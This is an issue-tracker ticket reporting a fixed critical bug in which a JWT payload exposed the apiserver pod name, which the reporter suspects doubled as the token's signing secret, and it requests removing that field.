-
Bug
-
Resolution: Fixed
-
Critical
-
None
-
None
-
None
-
NDS Sprint 37
While testing NDS-1094, I decoded a random JWT secret and noticed a potential glaring security hole:
{
|
"exp": 1513015808, |
"id": "lambert8", |
"orig_iat": 1513013179, |
"server": "ndslabs-apiserver-57c4j", |
"user": "lambert8" |
}
|
One of the fields above is "server" and contains the name of the current apiserver pod, but isn't this value also the JWT secret? We should probably replace that with the domain or something innocuous instead...
This ticket is complete when we have removed this field from the JWT.